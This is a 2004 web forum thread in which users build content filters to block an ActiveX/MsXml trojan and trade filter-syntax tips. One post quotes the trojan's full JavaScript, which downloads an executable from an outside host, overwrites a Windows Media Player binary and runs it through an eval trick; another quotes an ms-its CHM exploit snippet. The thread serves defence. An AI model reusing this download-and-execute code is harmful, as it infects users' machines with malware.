|
Donations |
|
 |
|
|
|
If you found this site helpful, please donate to help keep it online
Don't want to use PayPal? Try our physical address
|
|
|
Survey |
|
|
|
|
|
|
|
|
Translate |
|
|
|
|
|
|
|
|
|
|
| View previous topic :: View next topic |
| Author |
Message |
Fluffbutt
Cadet
Joined: Apr 07, 2004
Posts: 8
Location: Australia
|
 Posted: Wed Apr 07, 2004 1:25 pm Post subject: A filter to kill those MsXml Trojans |
|
|
Be nice, it's my first attempt..
| Code: |
Name = "Kill ActiveX Trojan 1a"
Active = TRUE
Multi = TRUE
URL = "$TYPE(htm)"
Limit = 4096
Match = "<textarea id=*/textarea>"
Replace = "<!-- [Textarea Trojan Killed] --!>"
Name = "Kill ActiveX Trojan 1b"
Active = TRUE
Multi = TRUE
URL = "$TYPE(htm)"
Limit = 4096
Match = "function preparecode*setTimeout"
Replace = "<!-- [ActiveX Trojan]--!>"
|
1a kills a textarea with a code id that sets up the trojan download
1b kills the javascript that runs the damn thing..
By the way - how do I put " into a filter
| Code: |
Match = "<textarea id=*/textarea>"
should be
Match = "<textarea id="code"*/textarea>"
for safety. |
Last edited by Fluffbutt on Tue Apr 13, 2004 10:35 am, edited 1 time in total
|
|
| Back to top |
|
 |
z12
Sergeant
Joined: Jul 17, 2002
Posts: 131
Location: USA
|
| Posted: Fri Apr 09, 2004 7:45 pm Post subject: |
|
|
Hi Fluffbutt,
I'm guessing your referring to this: http://www.securityfocus.com/archive/1/...04-04-08/0
snippet:
| Code: |
<!-- VVZkV2RXSXpaeja1 -->
<textarea style='display:none;' id='code'>
<object
data="ms-its:mhtml:file://C:\winhelp.mht!${PATH}/LOI.CHM
::/loi.htm" type="text/x-scriptlet"></object>
</textarea>
|
more info here: http://secunia.com/advisories/10523/
You might want to think about disabling any script or object code that has *.chm* or better yet, disable ActiveX for untrusted sites.
As for matching quotes in tags, probably your best bet is to use $AV() or $AVQ() depending on if you need to capture the quote marks.
| Code: |
<SomeTag *id=$AV(code)*>
|
This way, it doesn't matter if it's
id=code
id='code'
id="code"
Also, for html elements that have a start & end tag, like "object" for example, check out the $NEST() matching command. This is very useful, especially for matching table tags.
| Code: |
Bounds Match:$NEST(<object,</object>)
Matching Expression:*.chm*
Replacement Text:whatever
|
HTH
Mike
|
|
| Back to top |
|
|
Fluffbutt
Cadet
Joined: Apr 07, 2004
Posts: 8
Location: Australia
|
| Posted: Sun Apr 11, 2004 5:37 am Post subject: |
|
|
Actually I was referring to the reg33.exe virus from this code..
| Code: |
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
</textarea>
Wait a couple of seconds..
<script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line + '\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media");
}
window.open("error.jsp","_media");
setTimeout("doit()", 5000);
</script>
|
Thanks for the info on the *id=$AV(code)*> bit, I'll try it.
The nest command won't work, the filter doesn't fir off at all with nest - I tried it earlier.
Blush!!! The reason I couldn't find the edit button was I went to the page, then logged on, then went to the page (which was still in my isp's cache server - I needed to do a 'force reload' )... sorry mate!!!
_________________
|
Meeow!
Last edited by Fluffbutt on Tue Apr 13, 2004 10:30 am, edited 2 times in total
|
|
| Back to top |
|
|
LWC
Trooper
Joined: Feb 13, 2004
Posts: 27
Location: Israel
|
| Posted: Sun Apr 11, 2004 11:46 am Post subject: |
|
|
I've just been affected by that trojan too! Or at least something similar (in
my case, I think it was "just" a spyware, but who knows...well, at least
the mighty Ad Aware got rid of it).
Anyway, I've opened a topic recently about a more minor syndrom of said script trouble.
I've just added a new filter there that may solve your problem.
Check it out in:
http://www.computercops.biz/postp139489.html
P.S.
When you quote codes, ALWAYS use this forum's (actually, any forum's) "code" tag.
My filter (in the aforementioned URL) thought you're a hacker yourself and now this page is crippled...of course, if you're a nice guy, you'd edit your post and add said code tags, won't you?  |
|
| Back to top |
|
|
Fluffbutt
Cadet
Joined: Apr 07, 2004
Posts: 8
Location: Australia
|
| Posted: Mon Apr 12, 2004 10:26 am Post subject: |
|
|
| LWC wrote: |
| ...of course, if you're a nice guy, you'd edit your post and add said code tags, won't you? |
Umm, yes I am, and I would, but there's no 'edit' button here on my page - short of reposting the entire thing again, what can I do?
|
|
| Back to top |
|
|
LWC
Trooper
Joined: Feb 13, 2004
Posts: 27
Location: Israel
|
| Posted: Mon Apr 12, 2004 12:44 pm Post subject: |
|
|
Sure there is such a button. You just didn't notice it, I guess.
Note that it's a picture button so you can't look for the word "edit" and therefore must find it yourself.
You must be logged on, natrually, and then it's between the "quote" button and the "report" button (which is just a blue square, for some unknown reason) in the top right side of your post.
Oh, alright, I guess a picture is worth a thousand words...(i.e. look at the attachment).
| Description: |
|
| Filesize: |
40.64 KB |
| Viewed: |
21 Time(s) |
|
|
|
| Back to top |
|
|
Fluffbutt
Cadet
Joined: Apr 07, 2004
Posts: 8
Location: Australia
|
| Posted: Tue Apr 13, 2004 10:43 am Post subject: |
|
|
Lwc.. umm yup, sorry, see above for explanation.
<Fluffbutt runs off in shame and hide his tail....>
_________________
|
Meeow! |
|
| Back to top |
|
|
Fluffbutt
Cadet
Joined: Apr 07, 2004
Posts: 8
Location: Australia
|
| Posted: Tue Apr 13, 2004 10:45 am Post subject: |
|
|
Lwc.. umm yup, sorry, see above for explanation.
<Fluffbutt runs off in shame and hides his tail....>
_________________
|
Meeow! |
|
| Back to top |
|
|
Fluffbutt
Cadet
Joined: Apr 07, 2004
Posts: 8
Location: Australia
|
| Posted: Tue Apr 13, 2004 10:46 am Post subject: |
|
|
Damn!! how did that happens..
Sorry for double posting.
_________________
|
Meeow! |
|
| Back to top |
|
|
|
|
|
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum
|
Powered by phpBB 2.0.8a © 2001 phpBB Group
Version 2.0.6 of PHP-Nuke Port by Tom Nitzschner © 2002 www.toms-home.com
Version 2.2 by Paul Laudanski © 2003-2004 Computer Cops
|
You can syndicate our news using the file RSS 0.91, ultramode.txt, or RSS 1.0.
Forum FAQ
Search
Usergroups
Profile
Login to check your private messages
Login
